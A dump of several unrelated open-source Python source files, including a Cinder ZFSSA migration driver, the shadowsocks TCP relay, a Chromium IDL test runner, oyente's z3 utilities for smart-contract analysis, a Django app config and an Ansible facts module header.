'host: %(host)s, status=%(status)s',
{'id': volume['id'],
'host': host,
'status': volume['status']})
lcfg = self.configuration
default_ret = (False, None)
if volume['status'] != "available":
LOG.debug('Only available volumes can be migrated using backend '
'assisted migration. Defaulting to generic migration.')
return default_ret
if (host['capabilities']['vendor_name'] != 'Oracle' or
host['capabilities']['storage_protocol'] != self.protocol):
LOG.debug('Source and destination drivers need to be Oracle iSCSI '
'to use backend assisted migration. Defaulting to '
'generic migration.')
return default_ret
if 'location_info' not in host['capabilities']:
LOG.debug('Could not find location_info in capabilities reported '
'by the destination driver. Defaulting to generic '
'migration.')
return default_ret
loc_info = host['capabilities']['location_info']
try:
(tgt_asn, tgt_share) = loc_info.split(':')
except ValueError:
LOG.error(_LE("Location info needed for backend enabled volume "
"migration not in correct format: %s. Continuing "
"with generic volume migration."), loc_info)
return default_ret
src_asn = self.zfssa.get_asn()
if tgt_asn == src_asn and lcfg.zfssa_nfs_share == tgt_share:
LOG.info(_LI('Source and destination ZFSSA shares are the same. '
'Do nothing. volume: %s'), volume['name'])
return (True, None)
return (False, None)
def update_migrated_volume(self, ctxt, volume, new_volume,
original_volume_status):
"""Return model update for migrated volume.
:param volume: The original volume that was migrated to this backend
:param new_volume: The migration volume object that was created on
this backend as part of the migration process
:param original_volume_status: The status of the original volume
:return model_update to update DB with any needed changes
"""
original_name = CONF.volume_name_template % volume['id']
current_name = CONF.volume_name_template % new_volume['id']
LOG.debug('Renaming migrated volume: %(cur)s to %(org)s.',
{'cur': current_name,
'org': original_name})
self.zfssa.create_volume_from_snapshot_file(src_file=current_name,
dst_file=original_name,
method='MOVE')
provider_location = new_volume['provider_location']
return {'_name_id': None, 'provider_location': provider_location}
|
zyingp/shadowsocks
|
refs/heads/master
|
shadowsocks/tcprelay.py
|
922
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import time
import socket
import errno
import struct
import logging
import traceback
import random
from shadowsocks import encrypt, eventloop, shell, common
from shadowsocks.common import parse_header
# we clear at most TIMEOUTS_CLEAN_SIZE timeouts each time
TIMEOUTS_CLEAN_SIZE = 512
MSG_FASTOPEN = 0x20000000
# SOCKS command definition
CMD_CONNECT = 1
CMD_BIND = 2
CMD_UDP_ASSOCIATE = 3
# for each opening port, we have a TCP Relay
# for each connection, we have a TCP Relay Handler to handle the connection
# for each handler, we have 2 sockets:
# local: connected to the client
# remote: connected to remote server
# for each handler, it could be at one of several stages:
# as sslocal:
# stage 0 SOCKS hello received from local, send hello to local
# stage 1 addr received from local, query DNS for remote
# stage 2 UDP assoc
# stage 3 DNS resolved, connect to remote
# stage 4 still connecting, more data from local received
# stage 5 remote connected, piping local and remote
# as ssserver:
# stage 0 just jump to stage 1
# stage 1 addr received from local, query DNS for remote
# stage 3 DNS resolved, connect to remote
# stage 4 still connecting, more data from local received
# stage 5 remote connected, piping local and remote
STAGE_INIT = 0
STAGE_ADDR = 1
STAGE_UDP_ASSOC = 2
STAGE_DNS = 3
STAGE_CONNECTING = 4
STAGE_STREAM = 5
STAGE_DESTROYED = -1
# for each handler, we have 2 stream directions:
# upstream: from client to server direction
# read local and write to remote
# downstream: from server to client direction
# read remote and write to local
STREAM_UP = 0
STREAM_DOWN = 1
# for each stream, it's waiting for reading, or writing, or both
WAIT_STATUS_INIT = 0
WAIT_STATUS_READING = 1
WAIT_STATUS_WRITING = 2
WAIT_STATUS_READWRITING = WAIT_STATUS_READING | WAIT_STATUS_WRITING
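# Added illustrative note (not in the original module): the wait statuses are
# bit flags, so a stream marked READWRITING satisfies both bit tests below.
assert WAIT_STATUS_READWRITING & WAIT_STATUS_READING
assert WAIT_STATUS_READWRITING & WAIT_STATUS_WRITING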
BUF_SIZE = 32 * 1024
class TCPRelayHandler(object):
def __init__(self, server, fd_to_handlers, loop, local_sock, config,
dns_resolver, is_local):
self._server = server
self._fd_to_handlers = fd_to_handlers
self._loop = loop
self._local_sock = local_sock
self._remote_sock = None
self._config = config
self._dns_resolver = dns_resolver
# TCP Relay works as either sslocal or ssserver
# if is_local, this is sslocal
self._is_local = is_local
self._stage = STAGE_INIT
self._encryptor = encrypt.Encryptor(config['password'],
config['method'])
self._fastopen_connected = False
self._data_to_write_to_local = []
self._data_to_write_to_remote = []
self._upstream_status = WAIT_STATUS_READING
self._downstream_status = WAIT_STATUS_INIT
self._client_address = local_sock.getpeername()[:2]
self._remote_address = None
if 'forbidden_ip' in config:
self._forbidden_iplist = config['forbidden_ip']
else:
self._forbidden_iplist = None
if is_local:
self._chosen_server = self._get_a_server()
fd_to_handlers[local_sock.fileno()] = self
local_sock.setblocking(False)
local_sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
loop.add(local_sock, eventloop.POLL_IN | eventloop.POLL_ERR,
self._server)
self.last_activity = 0
self._update_activity()
def __hash__(self):
# default __hash__ is id / 16
# we want to eliminate collisions
return id(self)
@property
def remote_address(self):
return self._remote_address
def _get_a_server(self):
server = self._config['server']
server_port = self._config['server_port']
if type(server_port) == list:
server_port = random.choice(server_port)
if type(server) == list:
server = random.choice(server)
logging.debug('chosen server: %s:%d', server, server_port)
return server, server_port
def _update_activity(self, data_len=0):
# tell the TCP Relay we have had activity recently,
# otherwise it will think we are inactive and time us out
self._server.update_activity(self, data_len)
def _update_stream(self, stream, status):
# update a stream to a new waiting status
# check if status is changed
# only update if dirty
dirty = False
if stream == STREAM_DOWN:
if self._downstream_status != status:
self._downstream_status = status
dirty = True
elif stream == STREAM_UP:
if self._upstream_status != status:
self._upstream_status = status
dirty = True
if dirty:
if self._local_sock:
event = eventloop.POLL_ERR
if self._downstream_status & WAIT_STATUS_WRITING:
event |= eventloop.POLL_OUT
if self._upstream_status & WAIT_STATUS_READING:
event |= eventloop.POLL_IN
self._loop.modify(self._local_sock, event)
if self._remote_sock:
event = eventloop.POLL_ERR
if self._downstream_status & WAIT_STATUS_READING:
event |= eventloop.POLL_IN
if self._upstream_status & WAIT_STATUS_WRITING:
event |= eventloop.POLL_OUT
self._loop.modify(self._remote_sock, event)
def _write_to_sock(self, data, sock):
# write data to sock
# if only some of the data is written, put the remainder in the buffer
# and update the stream to wait for writing
if not data or not sock:
return False
uncomplete = False
try:
l = len(data)
s = sock.send(data)
if s < l:
data = data[s:]
uncomplete = True
except (OSError, IOError) as e:
error_no = eventloop.errno_from_exception(e)
if error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK):
uncomplete = True
else:
shell.print_exception(e)
self.destroy()
return False
if uncomplete:
if sock == self._local_sock:
self._data_to_write_to_local.append(data)
self._update_stream(STREAM_DOWN, WAIT_STATUS_WRITING)
elif sock == self._remote_sock:
self._data_to_write_to_remote.append(data)
self._update_stream(STREAM_UP, WAIT_STATUS_WRITING)
else:
logging.error('write_all_to_sock:unknown socket')
else:
if sock == self._local_sock:
self._update_stream(STREAM_DOWN, WAIT_STATUS_READING)
elif sock == self._remote_sock:
self._update_stream(STREAM_UP, WAIT_STATUS_READING)
else:
logging.error('write_all_to_sock:unknown socket')
return True
def _handle_stage_connecting(self, data):
if self._is_local:
data = self._encryptor.encrypt(data)
self._data_to_write_to_remote.append(data)
if self._is_local and not self._fastopen_connected and \
self._config['fast_open']:
# for sslocal and fastopen, we basically wait for data and use
# sendto to connect
try:
# only connect once
self._fastopen_connected = True
remote_sock = \
self._create_remote_socket(self._chosen_server[0],
self._chosen_server[1])
self._loop.add(remote_sock, eventloop.POLL_ERR, self._server)
data = b''.join(self._data_to_write_to_remote)
l = len(data)
s = remote_sock.sendto(data, MSG_FASTOPEN, self._chosen_server)
if s < l:
data = data[s:]
self._data_to_write_to_remote = [data]
else:
self._data_to_write_to_remote = []
self._update_stream(STREAM_UP, WAIT_STATUS_READWRITING)
except (OSError, IOError) as e:
if eventloop.errno_from_exception(e) == errno.EINPROGRESS:
# in this case data is not sent at all
self._update_stream(STREAM_UP, WAIT_STATUS_READWRITING)
elif eventloop.errno_from_exception(e) == errno.ENOTCONN:
logging.error('fast open not supported on this OS')
self._config['fast_open'] = False
self.destroy()
else:
shell.print_exception(e)
if self._config['verbose']:
traceback.print_exc()
self.destroy()
def _handle_stage_addr(self, data):
try:
if self._is_local:
cmd = common.ord(data[1])
if cmd == CMD_UDP_ASSOCIATE:
logging.debug('UDP associate')
if self._local_sock.family == socket.AF_INET6:
header = b'\x05\x00\x00\x04'
else:
header = b'\x05\x00\x00\x01'
addr, port = self._local_sock.getsockname()[:2]
addr_to_send = socket.inet_pton(self._local_sock.family,
addr)
port_to_send = struct.pack('>H', port)
self._write_to_sock(header + addr_to_send + port_to_send,
self._local_sock)
self._stage = STAGE_UDP_ASSOC
# just wait for the client to disconnect
return
elif cmd == CMD_CONNECT:
# just trim VER CMD RSV
data = data[3:]
else:
logging.error('unknown command %d', cmd)
self.destroy()
return
header_result = parse_header(data)
if header_result is None:
raise Exception('can not parse header')
addrtype, remote_addr, remote_port, header_length = header_result
logging.info('connecting %s:%d from %s:%d' %
(common.to_str(remote_addr), remote_port,
self._client_address[0], self._client_address[1]))
self._remote_address = (common.to_str(remote_addr), remote_port)
# pause reading
self._update_stream(STREAM_UP, WAIT_STATUS_WRITING)
self._stage = STAGE_DNS
if self._is_local:
# forward address to remote
self._write_to_sock((b'\x05\x00\x00\x01'
b'\x00\x00\x00\x00\x10\x10'),
self._local_sock)
data_to_send = self._encryptor.encrypt(data)
self._data_to_write_to_remote.append(data_to_send)
# note that this may go into _handle_dns_resolved directly
self._dns_resolver.resolve(self._chosen_server[0],
self._handle_dns_resolved)
else:
if len(data) > header_length:
self._data_to_write_to_remote.append(data[header_length:])
# note that this may go into _handle_dns_resolved directly
self._dns_resolver.resolve(remote_addr,
self._handle_dns_resolved)
except Exception as e:
self._log_error(e)
if self._config['verbose']:
traceback.print_exc()
self.destroy()
def _create_remote_socket(self, ip, port):
addrs = socket.getaddrinfo(ip, port, 0, socket.SOCK_STREAM,
socket.SOL_TCP)
if len(addrs) == 0:
raise Exception("getaddrinfo failed for %s:%d" % (ip, port))
af, socktype, proto, canonname, sa = addrs[0]
if self._forbidden_iplist:
if common.to_str(sa[0]) in self._forbidden_iplist:
raise Exception('IP %s is in forbidden list, reject' %
common.to_str(sa[0]))
remote_sock = socket.socket(af, socktype, proto)
self._remote_sock = remote_sock
self._fd_to_handlers[remote_sock.fileno()] = self
remote_sock.setblocking(False)
remote_sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
return remote_sock
def _handle_dns_resolved(self, result, error):
if error:
self._log_error(error)
self.destroy()
return
if result:
ip = result[1]
if ip:
try:
self._stage = STAGE_CONNECTING
remote_addr = ip
if self._is_local:
remote_port = self._chosen_server[1]
else:
remote_port = self._remote_address[1]
if self._is_local and self._config['fast_open']:
# for fastopen:
# wait for more data to arrive and send them in one SYN
self._stage = STAGE_CONNECTING
# we don't have to wait for remote since it's not
# created
self._update_stream(STREAM_UP, WAIT_STATUS_READING)
# TODO when there is already data in this packet
else:
# else do connect
remote_sock = self._create_remote_socket(remote_addr,
remote_port)
try:
remote_sock.connect((remote_addr, remote_port))
except (OSError, IOError) as e:
if eventloop.errno_from_exception(e) == \
errno.EINPROGRESS:
pass
self._loop.add(remote_sock,
eventloop.POLL_ERR | eventloop.POLL_OUT,
self._server)
self._stage = STAGE_CONNECTING
self._update_stream(STREAM_UP, WAIT_STATUS_READWRITING)
self._update_stream(STREAM_DOWN, WAIT_STATUS_READING)
return
except Exception as e:
shell.print_exception(e)
if self._config['verbose']:
traceback.print_exc()
self.destroy()
def _on_local_read(self):
# handle all local read events and dispatch them to methods for
# each stage
if not self._local_sock:
return
is_local = self._is_local
data = None
try:
data = self._local_sock.recv(BUF_SIZE)
except (OSError, IOError) as e:
if eventloop.errno_from_exception(e) in \
(errno.ETIMEDOUT, errno.EAGAIN, errno.EWOULDBLOCK):
return
if not data:
self.destroy()
return
self._update_activity(len(data))
if not is_local:
data = self._encryptor.decrypt(data)
if not data:
return
if self._stage == STAGE_STREAM:
if self._is_local:
data = self._encryptor.encrypt(data)
self._write_to_sock(data, self._remote_sock)
return
elif is_local and self._stage == STAGE_INIT:
# TODO check auth method
self._write_to_sock(b'\x05\00', self._local_sock)
self._stage = STAGE_ADDR
return
elif self._stage == STAGE_CONNECTING:
self._handle_stage_connecting(data)
elif (is_local and self._stage == STAGE_ADDR) or \
(not is_local and self._stage == STAGE_INIT):
self._handle_stage_addr(data)
def _on_remote_read(self):
# handle all remote read events
data = None
try:
data = self._remote_sock.recv(BUF_SIZE)
except (OSError, IOError) as e:
if eventloop.errno_from_exception(e) in \
(errno.ETIMEDOUT, errno.EAGAIN, errno.EWOULDBLOCK):
return
if not data:
self.destroy()
return
self._update_activity(len(data))
if self._is_local:
data = self._encryptor.decrypt(data)
else:
data = self._encryptor.encrypt(data)
try:
self._write_to_sock(data, self._local_sock)
except Exception as e:
shell.print_exception(e)
if self._config['verbose']:
traceback.print_exc()
# TODO use logging when debug completed
self.destroy()
def _on_local_write(self):
# handle local writable event
if self._data_to_write_to_local:
data = b''.join(self._data_to_write_to_local)
self._data_to_write_to_local = []
self._write_to_sock(data, self._local_sock)
else:
self._update_stream(STREAM_DOWN, WAIT_STATUS_READING)
def _on_remote_write(self):
# handle remote writable event
self._stage = STAGE_STREAM
if self._data_to_write_to_remote:
data = b''.join(self._data_to_write_to_remote)
self._data_to_write_to_remote = []
self._write_to_sock(data, self._remote_sock)
else:
self._update_stream(STREAM_UP, WAIT_STATUS_READING)
def _on_local_error(self):
logging.debug('got local error')
if self._local_sock:
logging.error(eventloop.get_sock_error(self._local_sock))
self.destroy()
def _on_remote_error(self):
logging.debug('got remote error')
if self._remote_sock:
logging.error(eventloop.get_sock_error(self._remote_sock))
self.destroy()
def handle_event(self, sock, event):
# handle all events in this handler and dispatch them to methods
if self._stage == STAGE_DESTROYED:
logging.debug('ignore handle_event: destroyed')
return
# order is important
if sock == self._remote_sock:
if event & eventloop.POLL_ERR:
self._on_remote_error()
if self._stage == STAGE_DESTROYED:
return
if event & (eventloop.POLL_IN | eventloop.POLL_HUP):
self._on_remote_read()
if self._stage == STAGE_DESTROYED:
return
if event & eventloop.POLL_OUT:
self._on_remote_write()
elif sock == self._local_sock:
if event & eventloop.POLL_ERR:
self._on_local_error()
if self._stage == STAGE_DESTROYED:
return
if event & (eventloop.POLL_IN | eventloop.POLL_HUP):
self._on_local_read()
if self._stage == STAGE_DESTROYED:
return
if event & eventloop.POLL_OUT:
self._on_local_write()
else:
logging.warn('unknown socket')
def _log_error(self, e):
logging.error('%s when handling connection from %s:%d' %
(e, self._client_address[0], self._client_address[1]))
def destroy(self):
# destroy the handler and release any resources
# promises:
# 1. destroy won't make another destroy() call inside
# 2. destroy releases resources so it prevents future call to destroy
# 3. destroy won't raise any exceptions
# if any of the promises are broken, it indicates a bug has been
# introduced! most likely memory leaks, etc.
if self._stage == STAGE_DESTROYED:
# this couldn't happen
logging.debug('already destroyed')
return
self._stage = STAGE_DESTROYED
if self._remote_address:
logging.debug('destroy: %s:%d' %
self._remote_address)
else:
logging.debug('destroy')
if self._remote_sock:
logging.debug('destroying remote')
self._loop.remove(self._remote_sock)
del self._fd_to_handlers[self._remote_sock.fileno()]
self._remote_sock.close()
self._remote_sock = None
if self._local_sock:
logging.debug('destroying local')
self._loop.remove(self._local_sock)
del self._fd_to_handlers[self._local_sock.fileno()]
self._local_sock.close()
self._local_sock = None
self._dns_resolver.remove_callback(self._handle_dns_resolved)
self._server.remove_handler(self)
class TCPRelay(object):
def __init__(self, config, dns_resolver, is_local, stat_callback=None):
self._config = config
self._is_local = is_local
self._dns_resolver = dns_resolver
self._closed = False
self._eventloop = None
self._fd_to_handlers = {}
self._timeout = config['timeout']
self._timeouts = [] # a list for all the handlers
# we trim the timeouts once in a while
self._timeout_offset = 0 # last checked position for timeout
self._handler_to_timeouts = {} # key: handler value: index in timeouts
if is_local:
listen_addr = config['local_address']
listen_port = config['local_port']
else:
listen_addr = config['server']
listen_port = config['server_port']
self._listen_port = listen_port
addrs = socket.getaddrinfo(listen_addr, listen_port, 0,
socket.SOCK_STREAM, socket.SOL_TCP)
if len(addrs) == 0:
raise Exception("can't get addrinfo for %s:%d" %
(listen_addr, listen_port))
af, socktype, proto, canonname, sa = addrs[0]
server_socket = socket.socket(af, socktype, proto)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(sa)
server_socket.setblocking(False)
if config['fast_open']:
try:
server_socket.setsockopt(socket.SOL_TCP, 23, 5)
except socket.error:
logging.error('warning: fast open is not available')
self._config['fast_open'] = False
server_socket.listen(1024)
self._server_socket = server_socket
self._stat_callback = stat_callback
def add_to_loop(self, loop):
if self._eventloop:
raise Exception('already added to loop')
if self._closed:
raise Exception('already closed')
self._eventloop = loop
self._eventloop.add(self._server_socket,
eventloop.POLL_IN | eventloop.POLL_ERR, self)
self._eventloop.add_periodic(self.handle_periodic)
def remove_handler(self, handler):
index = self._handler_to_timeouts.get(hash(handler), -1)
if index >= 0:
# delete is O(n), so we just set it to None
self._timeouts[index] = None
del self._handler_to_timeouts[hash(handler)]
def update_activity(self, handler, data_len):
if data_len and self._stat_callback:
self._stat_callback(self._listen_port, data_len)
# set handler to active
now = int(time.time())
if now - handler.last_activity < eventloop.TIMEOUT_PRECISION:
# thus we can lower timeout modification frequency
return
handler.last_activity = now
index = self._handler_to_timeouts.get(hash(handler), -1)
if index >= 0:
# delete is O(n), so we just set it to None
self._timeouts[index] = None
length = len(self._timeouts)
self._timeouts.append(handler)
self._handler_to_timeouts[hash(handler)] = length
def _sweep_timeout(self):
# tornado's timeout memory management is more flexible than we need
# we just need a sorted last_activity queue and it's faster than heapq
# in fact we can do O(1) insertion/removal, so we invent our own
if self._timeouts:
logging.log(shell.VERBOSE_LEVEL, 'sweeping timeouts')
now = time.time()
length = len(self._timeouts)
pos = self._timeout_offset
while pos < length:
handler = self._timeouts[pos]
if handler:
if now - handler.last_activity < self._timeout:
break
else:
if handler.remote_address:
logging.warn('timed out: %s:%d' %
handler.remote_address)
else:
logging.warn('timed out')
handler.destroy()
self._timeouts[pos] = None # free memory
pos += 1
else:
pos += 1
if pos > TIMEOUTS_CLEAN_SIZE and pos > length >> 1:
# compact the queue once the swept prefix exceeds
# TIMEOUTS_CLEAN_SIZE and covers more than half of the queue
self._timeouts = self._timeouts[pos:]
for key in self._handler_to_timeouts:
self._handler_to_timeouts[key] -= pos
pos = 0
self._timeout_offset = pos
def handle_event(self, sock, fd, event):
# handle events and dispatch to handlers
if sock:
logging.log(shell.VERBOSE_LEVEL, 'fd %d %s', fd,
eventloop.EVENT_NAMES.get(event, event))
if sock == self._server_socket:
if event & eventloop.POLL_ERR:
# TODO
raise Exception('server_socket error')
try:
logging.debug('accept')
conn = self._server_socket.accept()
TCPRelayHandler(self, self._fd_to_handlers,
self._eventloop, conn[0], self._config,
self._dns_resolver, self._is_local)
except (OSError, IOError) as e:
error_no = eventloop.errno_from_exception(e)
if error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK):
return
else:
shell.print_exception(e)
if self._config['verbose']:
traceback.print_exc()
else:
if sock:
handler = self._fd_to_handlers.get(fd, None)
if handler:
handler.handle_event(sock, event)
else:
logging.warn('poll removed fd')
def handle_periodic(self):
if self._closed:
if self._server_socket:
self._eventloop.remove(self._server_socket)
self._server_socket.close()
self._server_socket = None
logging.info('closed TCP port %d', self._listen_port)
if not self._fd_to_handlers:
logging.info('stopping')
self._eventloop.stop()
self._sweep_timeout()
def close(self, next_tick=False):
logging.debug('TCP close')
self._closed = True
if not next_tick:
if self._eventloop:
self._eventloop.remove_periodic(self.handle_periodic)
self._eventloop.remove(self._server_socket)
self._server_socket.close()
for handler in list(self._fd_to_handlers.values()):
handler.destroy()
|
AOSPU/external_chromium_org
|
refs/heads/android-5.0/py3
|
ppapi/generators/idl_tests.py
|
127
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Test runner for IDL Generator changes """
import subprocess
import sys
def TestIDL(testname, args):
print '\nRunning unit tests for %s.' % testname
try:
args = [sys.executable, testname] + args
subprocess.check_call(args)
return 0
except subprocess.CalledProcessError as err:
print 'Failed with %s.' % str(err)
return 1
def main(args):
errors = 0
errors += TestIDL('idl_lexer.py', ['--test'])
assert errors == 0
errors += TestIDL('idl_parser.py', ['--test'])
assert errors == 0
errors += TestIDL('idl_c_header.py', [])
assert errors == 0
errors += TestIDL('idl_c_proto.py', ['--wnone', '--test'])
assert errors == 0
errors += TestIDL('idl_gen_pnacl.py', ['--wnone', '--test'])
assert errors == 0
errors += TestIDL('idl_namespace.py', [])
assert errors == 0
errors += TestIDL('idl_node.py', [])
assert errors == 0
if errors:
print '\nFailed tests.'
return errors
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
oyente/oyente
|
refs/heads/master
|
utils.py
|
1
|
# return true if the two paths have different flows of money
# later on we may want to return more meaningful output: e.g. if the concurrency changes
# the amount of money or the recipient.
from z3 import *
from z3util import get_vars
import json
import mmap
import os
import csv
import re
import difflib
import signal
def my_copy_dict(input):
output = {}
for key in input:
if isinstance(input[key], list):
output[key] = list(input[key])
elif isinstance(input[key], dict):
output[key] = dict(input[key])
else:
output[key] = input[key]
return output
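# Added illustrative example (not in the original module); the names below are
# hypothetical. Containers are copied one level deep, so mutating a copied
# list does not touch the source dictionary:
#   src = {"stack": [1, 2], "pc": 0}
#   dup = my_copy_dict(src)
#   dup["stack"].append(3)   # src["stack"] is still [1, 2]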
# class Timeout():
# """Timeout class using ALARM signal."""
#
# def __init__(self, sec):
# self.sec = sec
#
# def __enter__(self):
# signal.signal(signal.SIGALRM, self.raise_timeout)
# signal.alarm(self.sec)
#
# def __exit__(self, *args):
# signal.alarm(0) # disable alarm
#
# def raise_timeout(self, *args):
# raise Exception("Timeout")
# check if a variable is a storage address in a contract
# currently accepts only int addresses in the storage
def is_storage_var(var):
return isinstance(var, (int, long))
# return True
# else:
# return isinstance(var, str) and var.startswith("Ia_store_")
# copy only storage values/variables from a given global state
# TODO: add balance in the future
def copy_global_values(global_state):
new_gstate = {}
for var in global_state["Ia"]:
if is_storage_var(var):
new_gstate[var] = global_state["Ia"][var]
return new_gstate
# check if a variable is in an expression
def is_in_expr(var, expr):
list_vars = get_vars(expr)
set_vars = set(i.decl().name() for i in list_vars)
return var in set_vars
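# Added usage sketch (not in the original module; the variables are
# hypothetical): with x = BitVec('x', 256) and y = BitVec('y', 256),
# is_in_expr('x', x + y) is True while is_in_expr('z', x + y) is False,
# since get_vars collects the declared names occurring in the expression.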
# check if an expression has any storage variables
def has_storage_vars(expr, storage_vars):
list_vars = get_vars(expr)
for var in list_vars:
if var in storage_vars:
return True
return False
def get_all_vars(list_of_storage_exprs):
ret_vars = []
for expr in list_of_storage_exprs:
ret_vars += get_vars(list_of_storage_exprs[expr])
return ret_vars
# rename variables to distinguish variables in two different paths.
# e.g. Ia_store_0 in path i becomes Ia_store_0_old if Ia_store_0 is modified
# else we must keep Ia_store_0 if it's not modified
def rename_vars(pcs, global_states):
ret_pcs = []
vars_mapping = {}
for expr in pcs:
list_vars = get_vars(expr)
for var in list_vars:
if var in vars_mapping:
expr = substitute(expr, (var, vars_mapping[var]))
continue
var_name = var.decl().name()
# check if a var is global
if var_name.startswith("Ia_store_"):
position = var_name.split('Ia_store_')[1]
# if it is not modified then keep the previous name
if position not in global_states:
continue
# otherwise, change the name of the variable
new_var_name = var_name + '_old'
new_var = BitVec(new_var_name, 256)
vars_mapping[var] = new_var
expr = substitute(expr, (var, vars_mapping[var]))
ret_pcs.append(expr)
ret_gs = {}
# replace variable in storage expression
for storage_addr in global_states:
expr = global_states[storage_addr]
# stupid z3 4.1 makes me add this line
if is_expr(expr):
list_vars = get_vars(expr)
for var in list_vars:
if var in vars_mapping:
expr = substitute(expr, (var, vars_mapping[var]))
continue
var_name = var.decl().name()
# check if a var is global
if var_name.startswith("Ia_store_"):
position = int(var_name.split('_')[len(var_name.split('_'))-1])
# if it is not modified
if position not in global_states:
continue
# otherwise, change the name of the variable
new_var_name = var_name + '_old'
new_var = BitVec(new_var_name, 256)
vars_mapping[var] = new_var
expr = substitute(expr, (var, vars_mapping[var]))
ret_gs[storage_addr] = expr
return ret_pcs, ret_gs
# split a file into smaller files
def split_dicts(filename, nsub = 500):
with open(filename) as json_file:
c = json.load(json_file)
current_file = {}
file_index = 1
for u, v in c.iteritems():
current_file[u] = v
if len(current_file) == nsub:
with open(filename.split(".")[0] + "_" + str(file_index) + '.json', 'w') as outfile:
json.dump(current_file, outfile)
file_index += 1
current_file.clear()
if len(current_file):
with open(filename.split(".")[0] + "_" + str(file_index) + '.json', 'w') as outfile:
json.dump(current_file, outfile)
current_file.clear()
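# Added hypothetical example (file names are illustrative, not from the
# original module): split_dicts("contract0.json", nsub=500) writes
# contract0_1.json, contract0_2.json, ... each holding at most 500 entries
# of the source mapping.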
def do_split_dicts():
for i in range(11):
split_dicts("contract" + str(i) + ".json")
os.remove("contract" + str(i) + ".json")
def run_re_file(re_str, fn):
size = os.stat(fn).st_size
with open(fn, 'r') as tf:
data = mmap.mmap(tf.fileno(), size, access=mmap.ACCESS_READ)
return re.findall(re_str, data)
def get_contract_info(contract_addr):
print "Getting info for contracts... " + contract_addr
file_name1 = "tmp/" + contract_addr + "_txs.html"
file_name2 = "tmp/" + contract_addr + ".html"
# get number of txs
txs = "unknown"
value = "unknown"
re_txs_value = r"<span>A total of (.+?) transactions found for address</span>"
re_str_value = r"<td>ETH Balance:\n<\/td>\n<td>\n(.+?)\n<\/td>"
try:
txs = run_re_file(re_txs_value, file_name1)
value = run_re_file(re_str_value, file_name2)
except Exception as e:
try:
os.system("wget -O %s http://etherscan.io/txs?a=%s" % (file_name1, contract_addr))
re_txs_value = r"<span>A total of (.+?) transactions found for address</span>"
txs = run_re_file(re_txs_value, file_name1)
# get balance
re_str_value = r"<td>ETH Balance:\n<\/td>\n<td>\n(.+?)\n<\/td>"
os.system("wget -O %s https://etherscan.io/address/%s" % (file_name2, contract_addr))
value = run_re_file(re_str_value, file_name2)
except Exception as e:
pass
return txs, value
def get_contract_stats(list_of_contracts):
with open("concurr.csv", "w") as stats_file:
fp = csv.writer(stats_file, delimiter=',')
fp.writerow(["Contract address", "No. of paths", "No. of concurrency pairs", "Balance", "No. of TXs", "Note"])
with open(list_of_contracts, "r") as f:
for contract in f.readlines():
contract_addr = contract.split()[0]
value, txs = get_contract_info(contract_addr)
fp.writerow([contract_addr, contract.split()[1], contract.split()[2],
value, txs, contract.split()[3:]])
def get_time_dependant_contracts(list_of_contracts):
with open("time.csv", "w") as stats_file:
fp = csv.writer(stats_file, delimiter=',')
fp.writerow(["Contract address", "Balance", "No. of TXs", "Note"])
with open(list_of_contracts, "r") as f:
for contract in f.readlines():
if len(contract.strip()) == 0:
continue
contract_addr = contract.split(".")[0].split("_")[1]
txs, value = get_contract_info(contract_addr)
fp.writerow([contract_addr, value, txs])
def get_distinct_contracts(list_of_contracts = "concurr.csv"):
flag = []
with open(list_of_contracts, "rb") as csvfile:
contracts = csvfile.readlines()[1:]
n =len(contracts)
for i in range(n):
flag.append(i) # mark which contract is similar to contract_i
for i in range(n):
if flag[i] != i:
continue
contract_i = contracts[i].split(",")[0]
npath_i = int(contracts[i].split(",")[1])
npair_i = int(contracts[i].split(",")[2])
file_i = "stats/tmp_" + contract_i + ".evm"
print " reading file " + file_i
for j in range(i+1, n):
if flag[j] != j:
continue
contract_j = contracts[j].split(",")[0]
npath_j = int(contracts[j].split(",")[1])
npair_j = int(contracts[j].split(",")[2])
if (npath_i == npath_j) and (npair_i == npair_j):
file_j = "stats/tmp_" + contract_j + ".evm"
with open(file_i, 'r') as f1, open(file_j, 'r') as f2:
code_i = f1.readlines()
code_j = f2.readlines()
if abs(len(code_i) - len(code_j)) >= 5:
continue
diff = difflib.ndiff(code_i, code_j)
ndiff = 0
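# count added/removed lines in the disassembly diff; fewer than 10 differing
# lines means contract j is treated as a near-duplicate of contract i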
for line in diff:
if line.startswith("+") or line.startswith("-"):
ndiff += 1
if ndiff < 10:
flag[j] = i
print flag
|
denisjul/democratos
|
refs/heads/master
|
democratos/CreateYourLaws/apps.py
|
1
|
from django.apps import AppConfig
class CreateyourlawsConfig(AppConfig):
name = 'CreateYourLaws'
def ready(self):
from CreateYourLaws import signals
|
chouseknecht/ansible
|
refs/heads/devel
|
lib/ansible/module_utils/facts/hardware/freebsd.py
|
101
|
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import re
from ansible.module_utils.facts.hardware.base import Hardware, HardwareCollector
from ansible.module_utils.facts.timeout import TimeoutError, timeout
